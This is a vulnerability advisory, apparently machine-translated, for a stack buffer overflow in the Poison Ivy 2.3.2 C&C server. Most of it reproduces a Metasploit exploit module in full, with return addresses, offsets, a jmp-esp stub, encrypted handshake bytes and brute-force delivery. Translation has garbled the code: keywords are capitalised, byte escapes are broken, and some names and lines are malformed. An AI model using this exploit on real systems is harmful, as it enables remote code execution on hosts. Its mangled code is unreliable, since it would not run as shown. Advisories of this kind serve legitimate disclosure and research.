Poison Ivy 'C & amp; C' Server Buffer Overflow Vulnerability

Release date:
Updated on:

Affected Systems:
Poison Ivy 2.3.2
Description:
--------------------------------------------------------------------------------
Bugtraq id: 54339

Poison Ivy is a remote management tool.

Poison Ivy 2.3.2 has a stack buffer overflow vulnerability. Attackers can exploit this vulnerability to execute arbitrary code in affected applications.

<* Source: Metasploit
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Metasploit () provides the following test methods:

##
# This file is part of the Metasploit Framework and may be subject
# Redistribution and specified cial restrictions. Please see the Metasploit
# Web site for more information on licensing and terms of use.
# Http://metasploit.com/
##

Require 'msf/core'

Class Metasploit3 <Msf: Exploit: Remote
Rank = NormalRanking

Include Msf: Exploit: Remote: Tcp
Include Msf: Exploit: Brute

Def initialize (info = {})
Super (update_info (info,
'Name' => "Poison Ivy 2.3.2 C & C Server Buffer Overflow ",
'Description' => % q {
This module exploits a stack buffer overflow in Poison Ivy 2.3.2 C & C server.
The exploit does not need to know the password chosen for the bot/server
Communication. If the C & C is configured with the default 'admin' password,
The exploit shoshould work fine. In case of the C & C configured with another
Password the exploit can fail. The 'check' command can be used to determine
If the C & C target is using the default 'admin' password.

Hopefully an exploit try won't crash the Poison Ivy C & C process, just the thread
Responsible of handling the connection. Because of this module provides
RANDHEADER option and a bruteforce target. If RANDHEADER is used a random header
Will be used. If the bruteforce target is selected, a random header will be sent in
Case the default for the password 'admin' doesn' t work. Bruteforce will stop after
5 tries or a session obtained.
},
'License '=> MSF_LICENSE,
'Author' =>
[
'Andrzej Dereszowski ', # Vulnerability Discovery
'Gal badishi', # Exploit and Metasploit module
'Juan vazquez' # Testing and little of Metasploit-fu
],
'References '=>
[
['Url', 'HTTP: // www. signal11.eu/en/research/articles/targeted_2010.pdf '],
['Url', 'HTTP: // badishi.com/own-and-you-shall-be-owned']
],
'Disclosuredate' => "Jun 24 2012 ",
'Defaultopexception' =>
{
'Deletec' => 'thread ',
},
'Payload' =>
{
'Stackadjustment' =>-4000,
'Space' => 10000,
'Badchars' => "",
},
'Platform' => 'win ',
'Targets' =>
[
['Ison Ivy 2.3.2/Windows XP SP3/Windows 7 SP1 ',
{
'Ret '=> 0x0041AA97, # jmp esp from "Poison Ivy 2.3.2.exe"
'Rwaddress' => 0x00401000,
'Offset' => 0x806D,
'Payloadoffset '=> 0x75,
'Jmppayload' => "\ x81 \ xec \ x00 \ x80 \ x00 \ x00 \ xff \ xe4" # sub esp, 0x8000 # jmp esp
}
],
['Ison Ivy 2.3.2-Bruteforce/Windows XP SP3/Windows 7 SP1 ',
{
'Ret '=> 0x0041AA97, # jmp esp from "Poison Ivy 2.3.2.exe"
'Rwaddress' => 0x00401000,
'Offset' => 0x806D,
'Payloadoffset '=> 0x75,
'Jmppayload' => "\ x81 \ xec \ x00 \ x80 \ x00 \ x00 \ xff \ xe4", # sub esp, 0x8000 # jmp esp
'Bruteforce' =>
{
'Start' => {'try' => 1 },
'Stop' => {'try' => 6 },
'Step' => 1,
'Delay' => 2
}
}
],
],
'Defaulttarget' => 0
))

Register_options (
[
Opt: RPORT (3460 ),
OptBool. new ('randhead', [true, 'Send random bytes as the header', false])
], Self. class)

Register_advanced_options (
[
OptInt. new ('brutewait', [false, "Delay between brute force attempts", 2]),
], Self. class)

End

Def check
Sig = "\ x35 \ xe1 \ x06 \ x6c \ xcd \ x15 \ x87 \ x3e \ xee \ xf8 \ x51 \ x89 \ x66 \ xb7 \ x0f \ x8b"
Lensig = [0x000015D0]. pack ("V ")

Connect
Sock. put ("\ x00" x 256)
Response = sock. read (1, 256)
Datalen = sock. read (4)
Disconnect

If datalen = lensig
If response [0, 16] = sig
Print_status ("Password appears to be \" admin \"")
Else
Print_status ("Unknown password-Bruteforce target or RANDHEADER can be tried and exploit launched until success .")
End
Return Exploit: CheckCode: Vulnerable
End
Return Exploit: CheckCode: Safe
End

Def single_exploit
If datastore ['randhead'] = true
# Generate a random header-allows multiple invocations of the exploit if it fails because we don't know the password
Header = rand_text (0x20)
Else
# This is the 32-byte header we want to send, encrypted with the default password ("admin ")
# We have a very good chance of succeeding even if the password was changed
Header = "\ xe7 \ x77 \ x44 \ x30 \ x9a \ xe8 \ x4b \ x79 \ xa6 \ x3f \ x11 \ xcd \ x58 \ xab \ x0c \ xdf \ x2a \ xcc \ xea \ x77 \ x6f \ x8c \ x27 \ x50 \ xda \ x30 \ x76 \ x00 \ x5d \ x15 \ xde \ xb7"
End
Do_exploit (header)
End

Def brute_exploit (brute_target)
If brute_target ['try'] = 1
Print_status ("Bruteforcing-Try # {brute_target ['try']}: Header for 'admin' password ")
# This is the 32-byte header we want to send, encrypted with the default password ("admin ")
# We have a very good chance of succeeding even if the password was changed
Header = "\ xe7 \ x77 \ x44 \ x30 \ x9a \ xe8 \ x4b \ x79 \ xa6 \ x3f \ x11 \ xcd \ x58 \ xab \ x0c \ xdf \ x2a \ xcc \ xea \ x77 \ x6f \ x8c \ x27 \ x50 \ xda \ x30 \ x76 \ x00 \ x5d \ x15 \ xde \ xb7"
Else
Print_status ("Bruteforcing-Try # {brute_target ['try']}: Random Header ")
# Generate a random header-allows multiple invocations of the exploit if it fails because we don't know the password
Header = rand_text (0x20)
End
Do_exploit (header)
End

Def do_exploit (header)
# Handshake
Connect
Print_status ("Deming handshake ...")
Sock. put ("\ x00" x 256)
Sock. get

# Don't change the nulls, or it might not work
Xploit =''
Xploit Xploit <"\ x00" * (target ['payloadoffset ']-xploit. length)
Xploit <payload. encoded
Xploit <"\ x00" * (target ['offset']-xploit. length)
Xploit <[target. ret]. pack ("V") # ret to a jmp esp opcode
Xploit <[target ['rwaddress']. pack ("V") # Readable/writeable-will be cleaned by original ret 4 (esp will point to the next dword)
Xploit <target ['jmppayload'] # This comes immediately after ret-it is a setup for the payload (jmp back)

# The disconnection triggers the exploit
Print_status ("Sending exploit ...")
Sock. put (xploit)
Select (nil, 5)
Disconnect
End

End

= Begin

* ROP version of exploit (): Has been discarded at the moment because of two reasons:

(1) Poison Ivy fails to run on DEP enabled systems (maybe due to the unpacking process)
(2) When trying a unpacked version on DEP enabled systems windows/exec payload runs, but not meterpreter

= End

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Poison Ivy
----------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.poisonivy-rat.com/index.php